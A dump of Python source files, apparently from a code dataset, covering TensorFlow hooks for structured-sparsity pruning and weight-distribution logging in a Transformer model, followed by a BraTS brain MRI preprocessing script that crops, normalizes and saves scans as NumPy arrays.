num_sub_block = sub_block_dim[0]*sub_block_dim[1]
layer_summary[layer_idx] = {'sub_block_dim': sub_block_dim,
'row_sparsity': [None]*num_sub_block,
'col_sparsity': [None]*num_sub_block,
'random_sparsity':[None]*num_sub_block,}
layer_summary = layer_summary[layer_idx]
sub_block_idx_1d = sub_block_idx[0]*sub_block_dim[1]+sub_block_idx[1]
tf.logging.info("%s %s", layer_summary['sub_block_dim'], sub_block_dim)
tf.logging.info("%s", layer_name)
assert(layer_summary['sub_block_dim']==sub_block_dim)
assert(layer_summary['row_sparsity'][sub_block_idx_1d]==None)
assert(layer_summary['col_sparsity'][sub_block_idx_1d]==None)
assert(layer_summary['random_sparsity'][sub_block_idx_1d]==None)
layer_summary['row_sparsity'][sub_block_idx_1d] = sparisty['row']
layer_summary['col_sparsity'][sub_block_idx_1d] = sparisty['col']
layer_summary['random_sparsity'][sub_block_idx_1d] = sparisty['elt']
sparsity_summary['total_weights'] += sub_block_dim[0]*sub_block_dim[1]
sparsity_summary['total_nonzero_structured_weights'] += sub_block_dim[0]*sub_block_dim[1]*(1-sparisty['row'])*(1-sparisty['col'])
'''
print sparsity result of model
'''
def print_sparsity_info(sparsity_results, print_level=0, save_sparsity_info=False):
sparsity_dict = {}
for name, sparsity in sparsity_results.iteritems():
layer_name = name[:-13]
if layer_name in sparsity_dict:
sparsity_dict[layer_name][name[-3:]] = sparsity
else:
sparsity_dict[layer_name] = {'elt': 0, 'col': 0, 'row': 0}
sparsity_dict[layer_name][name[-3:]] = sparsity
var_list = tf.trainable_variables()
sparsity_summary = {'ffn_1':
{'encoder':{}, 'decoder':{}},
'ffn_2':
{'encoder':{}, 'decoder':{}},
'multihead_attention':
{'output_transform': {'encoder':{}, 'decoder':{'self_atten':{}, 'encdec_atten':{}}},
'q':{'encoder':{}, 'decoder':{'self_atten':{}, 'encdec_atten':{}}},
'k':{'encoder':{}, 'decoder':{'self_atten':{}, 'encdec_atten':{}}},
'v':{'encoder':{}, 'decoder':{'self_atten':{}, 'encdec_atten':{}}}},
'total_weights': 0,
'total_nonzero_structured_weights': 0}
tf.logging.info("##############################################")
for layer_name, sparsities in sparsity_dict.iteritems():
for v in var_list:
if v.op.name == layer_name:
dims = v.get_shape().as_list()
if print_level>0:
tf.logging.info("--- Layer: %s of Dimension: %s--", layer_name, dims)
break
if print_level>0:
tf.logging.info(" Overall Random Sparsity: %0.4f %%", sparsities['elt']*100)
tf.logging.info(" Row Sparsity: %0.4f %%", sparsities['row']*100)
tf.logging.info(" Column Sparsity: %0.4f %%", sparsities['col']*100)
fill_sparisity_summary(sparsity_summary, sparsities, layer_name, dims)
tf.logging.info("%s", sparsity_summary)
if save_sparsity_info:
pickle.dump(sparsity_summary, open("sparsity_summary.p", "wb"))
tf.logging.info("##############################################")
class SSLEvalHook(tf.train.SessionRunHook):
def __init__(self, zero_threshold):
self.zero_threshold = zero_threshold
self.sparsity = {}
tf.logging.info("### transformer.py: _LoggerHook initialized")
def begin(self):
tf.logging.info("### transformer.py: _LoggerHook begin")
# get weights
weights = tf.trainable_variables()
weights = [w for w in weights if should_prune_v2(w)]
# establish a graph for zerout by small threshold and print sparsity statistics'
for train_var in weights:
# zerout by small threshold to stablize the sparsity
sp_name = train_var.op.name
# self.zero_threshold = max(self.zero_threshold, 2*config_params['weight_decay'])
where_cond = tf.less(tf.abs(train_var), self.zero_threshold)
train_var = tf.assign(train_var,
tf.where(where_cond, tf.zeros(tf.shape(train_var)), train_var))
# statistics
s = tf.nn.zero_fraction(train_var)
self.sparsity[sp_name + '_sparsity_elt'] = s
s = tf.nn.zero_fraction(tf.reduce_sum(tf.square(train_var), axis=0))
self.sparsity[sp_name + '_sparsity_col'] = s
s = tf.nn.zero_fraction(tf.reduce_sum(tf.square(train_var), axis=1))
self.sparsity[sp_name + '_sparsity_row'] = s
# print sparisty results after creating the session
def after_create_session(self, session, coord):
sparsity_results = session.run(self.sparsity)
print_sparsity_info(sparsity_results)
def before_run(self, run_context):
pass
def after_run(self, run_context, run_values):
pass
class SSLInitialWeightHook(tf.train.SessionRunHook):
def __init__(self, warm_start_from):
tf.logging.info("ssl_hooks.py: Checkpoint dir: %s", warm_start_from)
self.warm_start_from = warm_start_from
# variable_map = {}
# for var in tf.contrib.framework.get_trainable_variables():
# var_name = var.name.split(":")[0]
# if reader.has_tensor(var_name):
# tf.logging.info("Loading variable from checkpoint: %s", var_name)
# variable_map[var_name] = var
# else:
# tf.logging.info("Cannot find variable in checkpoint, skipping: %s",
# var_name)
# tf.train.init_from_checkpoint(ckpt_dir, variable_map)
# tf.logging.info("### ssl_hooks.py: SSLInitialWeightHook initialized")
'''
Given the new layer name, return the corresponding old layer tensor
'''
def find_layer_tensor(self, new_name):
name = new_name[new_name.find('/'):]
name = self.old_model_name+name
if '_sub_block' in name:
name = name.split('/')
for n in name:
if '_sub_block' in n:
pos_info_str = n
break
name.remove(pos_info_str)
name = '/'.join(name)
tensor = self.reader.get_tensor(name)
# print (name)
shape_tensor = self.var_to_shape_map[name]
# print ('----', shape_tensor)
pos_info = []
for i in pos_info_str.split('_'):
if unicode(i, 'utf-8').isnumeric():
pos_info.append(int(i))
input_idx, in_group, output_idx, out_group = pos_info
# Deal with bias
if len(shape_tensor)==1:
col_left_bound = int(shape_tensor[0]*float(output_idx)/out_group)
col_right_bound = int(shape_tensor[0]*float(output_idx+1)/out_group)
tensor = tensor[col_left_bound:col_right_bound]
return tensor/in_group
# deal with kernel
row_left_bound = int(shape_tensor[0]*float(input_idx)/in_group)
row_right_bound = int(shape_tensor[0]*float(input_idx+1)/in_group)
col_left_bound = int(shape_tensor[1]*float(output_idx)/out_group)
col_right_bound = int(shape_tensor[1]*float(output_idx+1)/out_group)
# print (row_left_bound, row_right_bound, col_left_bound, col_right_bound)
tensor = tensor[row_left_bound:row_right_bound, col_left_bound:col_right_bound]
return tensor
else:
tensor = self.reader.get_tensor(name)
return self.reader.get_tensor(name)
def weight_initialization_graph(self):
self.set_weight_op = tf.no_op()
weights = tf.trainable_variables()
for w in weights:
# print (w.op.name)
# print (self.layer_tensor_map[w.op.name].shape)
w = tf.assign(w, self.layer_tensor_map[w.op.name])
self.set_weight_op = tf.group(self.set_weight_op, w)
def begin(self):
tf.logging.info("### ssl_hooks.py: SSLInitialWeightHook begin")
self.layer_tensor_map = {}
# Get the new model name(new ssl model) and old model name(warm start from)
new_model_name = tf.contrib.framework.get_trainable_variables()[0]
# print (new_model_name)
new_model_name = new_model_name.name.split(":")[0]
self.new_model_name = new_model_name[:new_model_name.find('/')]
self.reader = tf.contrib.framework.load_checkpoint(self.warm_start_from)
self.var_to_shape_map = self.reader.get_variable_to_shape_map()
# print ('############# OLD MODEL NAME #############')
# print (self.var_to_shape_map.keys())
old_model_name = self.var_to_shape_map.keys()[0]
old_model_name = old_model_name.split('/')
for i in range(len(old_model_name)):
if old_model_name[i]=='body':
self.old_model_name = old_model_name[i-1]
break
# Generate the map from new layer name to its initilization tensor from old layer name
for var in tf.contrib.framework.get_trainable_variables():
var_name = var.name.split(":")[0]
self.layer_tensor_map[var_name] = self.find_layer_tensor(var_name)
# Generate the weight initialization graph
self.weight_initialization_graph()
def after_create_session(self, session, coord):
tf.logging.info("### ssl_hooks.py: SSLInitialWeightHook after_create_session")
session.run(self.set_weight_op)
def before_run(self, run_context):
pass
def after_run(self, run_context, run_values):
pass
class SSLFinetuneHook(tf.train.SessionRunHook):
def __init__(self, zero_threshold):
self.zero_threshold = zero_threshold
self.save_sparsity_info = True
self.sparsity = {}
self.white_list = ['atten']
self.black_list = ['bias']
'''
implement the pruning strategy and generate:
self.set_weight_op: operator that sets weights to 0 based on zero_threshold
self.zero_mask: tensor that gets the zero_mask to zerout the future gradient update
self.sparsity: tensor to get the model sparsity information
'''
def ssl_pruning(self, weights):
self.set_weight_op = tf.no_op()
self.zero_mask = {}
self.sparsity = {}
for w in weights:
# w_shape = tf.map_fn(lambda x: (x), tf.shape(w))
row, col = w.get_shape()
w_name = w.op.name
if 'body' in w_name:
# get the where condition of structure sparsity
abs_w = tf.abs(w)
col_max_w = tf.reduce_max(abs_w, axis=0)
row_max_w = tf.reduce_max(abs_w, axis=1)
where_cond_col = tf.expand_dims(tf.less(col_max_w, self.zero_threshold), axis=0)
where_cond_col = tf.tile(where_cond_col, [row, 1])
where_cond_row = tf.expand_dims(tf.less(row_max_w, self.zero_threshold), axis=1)
where_cond_row = tf.tile(where_cond_row, [1, col])
where_cond = tf.logical_or(where_cond_col, where_cond_row)
# sets weights to 0 based on zero_threshold
w = tf.assign(w,
tf.where(where_cond, tf.zeros_like(w), w))
self.set_weight_op = tf.group(self.set_weight_op, w)
# gets the zero_mask to zerout the future gradient update
mask = tf.where(where_cond, tf.zeros_like(w), tf.ones_like(w))
self.zero_mask[w_name+'_mask'] = mask
# get the model sparsity information
s = tf.nn.zero_fraction(mask)
self.sparsity[w_name + '_sparsity_elt'] = s
s = tf.nn.zero_fraction(tf.reduce_sum(tf.square(w), axis=0))
self.sparsity[w_name + '_sparsity_col'] = s
s = tf.nn.zero_fraction(tf.reduce_sum(tf.square(w), axis=1))
self.sparsity[w_name + '_sparsity_row'] = s
# generate the operation zerout weights with masks during each training steps
def zerout_weights_with_masks(self, weights):
self.mask_placeholders = {}
self.zerout_op = tf.no_op()
for w in weights:
# w_shape = tf.shape(w)
w_shape = w.get_shape()
w_name = w.op.name
# store the mask placeholder for future assignment
mask_placeholder = tf.placeholder(w.dtype, shape=w_shape)
self.mask_placeholders[w_name+'_mask']=mask_placeholder
# update weight
updated_weight = tf.multiply(w, mask_placeholder)
op = tf.assign(w, updated_weight)
self.zerout_op = tf.group(self.zerout_op, op)
def begin(self):
tf.logging.info("### transformer.py: _SSLfinetuneHook begin")
# get weights
weights = tf.trainable_variables()
weights = [w for w in weights if should_prune_v2(w)]
# establish graphs to prune weight, get mask, and print sparsity before session run
self.ssl_pruning(weights)
# establish a graph to zerout weights with masks during each training steps
self.zerout_weights_with_masks(weights)
def after_create_session(self, session, coord):
# sets weights to 0 based on zero_threshold
session.run(self.set_weight_op)
# get zero masks to zerout weights with masks during each training steps
self.zero_masks_np = session.run(self.zero_mask)
# print the final structure sparsity
sparsity_results = session.run(self.sparsity)
print_sparsity_info(sparsity_results, save_sparsity_info=self.save_sparsity_info)
self.save_sparsity_info=False
def before_run(self, run_context):
'''
Unlike wei's realization which apply zero masks to gradients before weights update
I apply the zero masks on the weights after the weights are updated with gradients
The aforementioned two realization achieves the same result
'''
zero_masks_dict={}
# for i, placeholder in enumerate((self.mask_placeholders.values())):
# zero_masks_dict[placeholder] = self.zero_masks_np[i]
for name, placeholder in self.mask_placeholders.iteritems():
if name in self.zero_masks_np.keys():
zero_masks_dict[placeholder] = self.zero_masks_np[name]
else:
raise ValueError('Can not found zero_mask of layer: %s', name)
return tf.train.SessionRunArgs(self.zerout_op, feed_dict=zero_masks_dict)
def after_run(self, run_context, run_values):
# check the weight sparsity for debug purpose
# tf.logging.info("### ssl_hooks.py: after_run executed tensors: ----%s", run_values.results)
pass
```
#### File: tensor2tensor/visualization/wei_feat_distrib.py
```python
import numpy as np
from tensor2tensor.layers import common_layers
from tensor2tensor.utils import registry
import tensorflow as tf
import numpy as np
import math
@registry.register_pruning_strategy
def weight(w, sparsity):
"""Weight-level magnitude pruning."""
w_shape = common_layers.shape_list(w)
k = int(np.prod(w_shape[:-1]))
count = tf.to_int32(k * sparsity)
mask = common_layers.weight_targeting(w, count)
return (1 - mask) * w if len(w_shape)>1 else w
@registry.register_pruning_strategy
def unit(w, sparsity):
"""Unit-level magnitude pruning."""
w_shape = common_layers.shape_list(w)
count = tf.to_int32(w_shape[-1] * sparsity)
mask = common_layers.unit_targeting(w, count)
return (1 - mask) * w if len(w_shape)>1 else w
def should_show(name, pruning_params):
"""Whether to show the layer's distribution or not."""
in_whitelist = not pruning_params.white_list or any(
e in name for e in pruning_params.white_list)
in_blacklist = any(e in name for e in pruning_params.black_list)
if pruning_params.white_list and not in_whitelist:
return False
elif in_blacklist:
return False
return True
def feat_sparsity_acc_tradeoff():
pass
# def wei_sparsity_acc_tradeoff():
# pass
def feat_distrib(sess, eval_model, pruning_strategy, pruning_params, num_steps=10):
pass
def get_weight_distrib_graph(pruning_params):
weights = tf.trainable_variables()
weights = [w for w in weights if should_show(w.name, pruning_params)]
weights_name = [w.name for w in weights]
for weight, weight_name in zip(weights, weights_name):
tf.summary.histogram('Weight Hist-'+weight_name, weight)
def print_weight_distrib(sess, pruning_params, num_steps=10):
weights = tf.trainable_variables()
# tf.logging.info("### wei_feat_distrib.py layer names %s", weights)
weights = [w for w in weights if should_show(w.name, pruning_params)]
weights_name = [w.name for w in weights]
weights = sess.run(weights)
for weight, weight_name in zip(weights, weights_name):
weight = np.absolute(weight)
max_weight = weight.max()
hist, bin_edges = np.histogram(weight,
bins=np.arange(0, max_weight+0.000001, max_weight/num_steps),
density=True)
hist /= hist.sum()
tf.logging.info("\n ---"+weight_name+"\n Hist: %s \n Range: (%0.1f - %0.5f) \n Step: %0.5f" ,
hist, bin_edges[0], bin_edges[-1], max_weight/num_steps)
def wei_sparsity_acc_tradeoff(sess, eval_model, pruning_strategy, pruning_params, summary_writer):
"""Prune the weights of a model and evaluate."""
# tf.logging.info("### wei_feat_distrib.py Weight sparsity accuracy tradeoff ###")
weights = tf.trainable_variables()
weights = [w for w in weights if should_show(w.name, pruning_params)]
# tf.logging.info("Pruning weights: %s" % weights.shape)
# tf.logging.info("Pruning weights: %s" % weights[1])
unpruned_weights = sess.run(weights)
# tf.logging.info("debugggg: %s" % unpruned_weights[1])
reset_op = tf.no_op()
for w, ow in zip(weights, unpruned_weights):
op = tf.assign(w, ow)
reset_op = tf.group(reset_op, op)
for step, sparsity in enumerate(pruning_params.weight_sparsities):
set_weights_op = tf.no_op()
for w in weights:
op = tf.assign(w, pruning_strategy(w, sparsity))
set_weights_op = tf.group(set_weights_op, op)
sess.run(set_weights_op)
acc = eval_model()
tf.logging.info("\tPruning to sparsity = %f: acc or bleu = %f" % (sparsity, acc))
sess.run(reset_op)
merged = tf.summary.merge_all()
summary = sess.run(merged)
summary_writer.add_summary(summary, step)
``` |
{
"source": "Jiachenn99/batchgenerators",
"score": 2
} |
#### File: examples/brats2017/brats2017_preprocessing.py
```python
import numpy as np
# from batchgenerators.examples.brats2017.config import brats_preprocessed_folder, \
# brats_folder_with_downloaded_train_data, num_threads_for_brats_example
from batchgenerators.examples.brats2017.config import num_threads_for_brats_example
from batchgenerators.utilities.file_and_folder_operations import *
try:
import SimpleITK as sitk
except ImportError:
print("You need to have SimpleITK installed to run this example!")
raise ImportError("SimpleITK not found")
from multiprocessing import Pool
def get_list_of_files(base_dir):
"""
returns a list of lists containing the filenames. The outer list contains all training examples. Each entry in the
outer list is again a list pointing to the files of that training example in the following order:
T1, T1c, T2, FLAIR, segmentation
:param base_dir:
:return:
"""
list_of_lists = []
for glioma_type in ['HGG', 'LGG']:
current_directory = join(base_dir, glioma_type)
# print(current_directory)
patients = subfolders(current_directory, join=False)
for p in patients:
# print(p)
patient_directory = join(current_directory, p)
t1_file = join(patient_directory, p + "_t1.nii.gz")
t1c_file = join(patient_directory, p + "_t1ce.nii.gz")
t2_file = join(patient_directory, p + "_t2.nii.gz")
flair_file = join(patient_directory, p + "_flair.nii.gz")
seg_file = join(patient_directory, p + "_seg.nii.gz")
this_case = [t1_file, t1c_file, t2_file, flair_file, seg_file]
assert all((isfile(i) for i in this_case)), "some file is missing for patient %s; make sure the following " \
"files are there: %s" % (p, str(this_case))
list_of_lists.append(this_case)
print("Found %d patients" % len(list_of_lists))
return list_of_lists
def get_list_of_files_validation_2018(base_dir):
"""
returns a list of lists containing the filenames. The outer list contains all training examples. Each entry in the
outer list is again a list pointing to the files of that training example in the following order:
T1, T1c, T2, FLAIR, segmentation
:param base_dir:
:return:
"""
list_of_lists = []
# current_directory = join(base_dir, glioma_type)
current_directory = base_dir
# print(current_directory)
patients = subfolders(current_directory, join=False)
for p in patients:
# print(p)
patient_directory = join(current_directory, p)
t1_file = join(patient_directory, p + "_t1.nii.gz")
t1c_file = join(patient_directory, p + "_t1ce.nii.gz")
t2_file = join(patient_directory, p + "_t2.nii.gz")
flair_file = join(patient_directory, p + "_flair.nii.gz")
# seg_file = join(patient_directory, p + "_seg.nii.gz")
# this_case = [t1_file, t1c_file, t2_file, flair_file, seg_file]
this_case = [t1_file, t1c_file, t2_file, flair_file]
assert all((isfile(i) for i in this_case)), "some file is missing for patient %s; make sure the following " \
"files are there: %s" % (p, str(this_case))
list_of_lists.append(this_case)
print("Found %d patients" % len(list_of_lists))
return list_of_lists
def load_and_preprocess(case, patient_name, output_folder):
"""
loads, preprocesses and saves a case
This is what happens here:
1) load all images and stack them to a 4d array
2) crop to nonzero region, this removes unnecessary zero-valued regions and reduces computation time
3) normalize the nonzero region with its mean and standard deviation
4) save 4d tensor as numpy array. Also save metadata required to create niftis again (required for export
of predictions)
:param case:
:param patient_name:
:return:
"""
# load SimpleITK Images
imgs_sitk = [sitk.ReadImage(i) for i in case]
# get pixel arrays from SimpleITK images
imgs_npy = [sitk.GetArrayFromImage(i) for i in imgs_sitk]
# get some metadata
spacing = imgs_sitk[0].GetSpacing()
# the spacing returned by SimpleITK is in inverse order relative to the numpy array we receive. If we wanted to
# resample the data and if the spacing was not isotropic (in BraTS all cases have already been resampled to 1x1x1mm
# by the organizers) then we need to pay attention here. Therefore we bring the spacing into the correct order so
# that spacing[0] actually corresponds to the spacing of the first axis of the numpy array
spacing = np.array(spacing)[::-1]
direction = imgs_sitk[0].GetDirection()
origin = imgs_sitk[0].GetOrigin()
original_shape = imgs_npy[0].shape
# now stack the images into one 4d array, cast to float because we will get rounding problems if we don't
imgs_npy = np.concatenate([i[None] for i in imgs_npy]).astype(np.float32)
# now find the nonzero region and crop to that
nonzero = [np.array(np.where(i != 0)) for i in imgs_npy]
nonzero = [[np.min(i, 1), np.max(i, 1)] for i in nonzero]
nonzero = np.array([np.min([i[0] for i in nonzero], 0), np.max([i[1] for i in nonzero], 0)]).T
# nonzero now has shape 3, 2. It contains the (min, max) coordinate of nonzero voxels for each axis
# now crop to nonzero
imgs_npy = imgs_npy[:,
nonzero[0, 0] : nonzero[0, 1] + 1,
nonzero[1, 0]: nonzero[1, 1] + 1,
nonzero[2, 0]: nonzero[2, 1] + 1,
]
# now we create a brain mask that we use for normalization
nonzero_masks = [i != 0 for i in imgs_npy[:-1]]
brain_mask = np.zeros(imgs_npy.shape[1:], dtype=bool)
for i in range(len(nonzero_masks)):
brain_mask = brain_mask | nonzero_masks[i]
# now normalize each modality with its mean and standard deviation (computed within the brain mask)
for i in range(len(imgs_npy) - 1):
mean = imgs_npy[i][brain_mask].mean()
std = imgs_npy[i][brain_mask].std()
imgs_npy[i] = (imgs_npy[i] - mean) / (std + 1e-8)
imgs_npy[i][brain_mask == 0] = 0
# the segmentation of brats has the values 0, 1, 2 and 4. This is pretty inconvenient to say the least.
# We move everything that is 4 to 3
imgs_npy[-1][imgs_npy[-1] == 4] = 3
# now save as npz
np.save(join(output_folder, patient_name + ".npy"), imgs_npy)
metadata = {
'spacing': spacing,
'direction': direction,
'origin': origin,
'original_shape': original_shape,
'nonzero_region': nonzero
}
save_pickle(metadata, join(output_folder, patient_name + ".pkl"))
def save_segmentation_as_nifti(segmentation, metadata, output_file):
original_shape = metadata['original_shape']
seg_original_shape = np.zeros(original_shape, dtype=np.uint8)
nonzero = metadata['nonzero_region']
seg_original_shape[nonzero[0, 0] : nonzero[0, 1] + 1,
nonzero[1, 0]: nonzero[1, 1] + 1,
nonzero[2, 0]: nonzero[2, 1] + 1] = segmentation
sitk_image = sitk.GetImageFromArray(seg_original_shape)
sitk_image.SetDirection(metadata['direction'])
sitk_image.SetOrigin(metadata['origin'])
# remember to revert spacing back to sitk order again
sitk_image.SetSpacing(tuple(metadata['spacing'][[2, 1, 0]]))
sitk.WriteImage(sitk_image, output_file)
if __name__ == "__main__":
# This is the same preprocessing I used for our contributions to the BraTS 2017 and 2018 challenges.
# Preprocessing is described in the documentation of load_and_preprocess
# The training data is identical between BraTS 2017 and 2018. You can request access here:
# https://ipp.cbica.upenn.edu/#BraTS18_registration
# brats_base points to where the extracted downloaded training data is
# preprocessed data is saved as npy. This may seem odd if you are familiar with medical images, but trust me it's
# the best way to do this for deep learning. It does not make much of a difference for BraTS, but if you are
# dealing with larger images this is crusial for your pipelines to not get stuck in CPU bottleneck. What we can do
# with numpy arrays is we can load them via np.load(file, mmap_mode="r") and then read just parts of it on the fly
# during training. This is super important if your patch size is smaller than the size of the entire patient (for
# example if you work with large CT data or if you need 2D slices).
# For this to work properly the output_folder (or wherever the data is stored during training) must be on an SSD!
# HDDs are usually too slow and you also wouldn't want to do this over a network share (there are exceptions but
# take this as a rule of thumb)
# Why is this not an IPython Notebook you may ask? Because I HATE IPython Notebooks. Simple :-)
brats_preprocessed_folder = "C:/Users/JiachennCJC/Documents/GitHub/batchgenerators/brats_data_preprocessed/BraTS2018Validation_preprocessed"
brats_folder_with_downloaded_data = "C:/Users/JiachennCJC/Downloads/MICCAI_BraTS_2018_Data_Validation_new/"
# list_of_lists = get_list_of_files(brats_folder_with_downloaded_train_data)
list_of_lists = get_list_of_files_validation_2018(brats_folder_with_downloaded_data)
maybe_mkdir_p(brats_preprocessed_folder)
# patient_names = [i[0].split("/")[-2] for i in list_of_lists]
# windows_patient_names = [i[0].split("\\")[2] for i in list_of_lists]
windows_patient_names = [i[0].split("\\")[0].split("/")[-1] for i in list_of_lists]
p = Pool(processes=num_threads_for_brats_example)
# # p.starmap(load_and_preprocess, zip(list_of_lists, patient_names, [brats_preprocessed_folder] * len(list_of_lists)))
# For windows systems
p.starmap(load_and_preprocess, zip(list_of_lists, windows_patient_names, [brats_preprocessed_folder] * len(list_of_lists)))
p.close()
p.join()
# # remember that we cropped the data before preprocessing. If we predict the test cases, we want to run the same
# # preprocessing for them. We need to then put the segmentation back into its original position (due to cropping).
# # Here is how you can do that:
# # lets use Brats17_2013_0_1 for this example
# img = np.load(join(brats_preprocessed_folder, "Brats17_2013_0_1.npy"))
# metadata = load_pickle(join(brats_preprocessed_folder, "Brats17_2013_0_1.pkl"))
# # remember that we changed the segmentation labels from 0, 1, 2, 4 to 0, 1, 2, 3. We need to change that back to
# # get the correct format
# img[-1][img[-1] == 3] = 4
# save_segmentation_as_nifti(img[-1], metadata, join(brats_preprocessed_folder, "delete_me.nii.gz"))
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.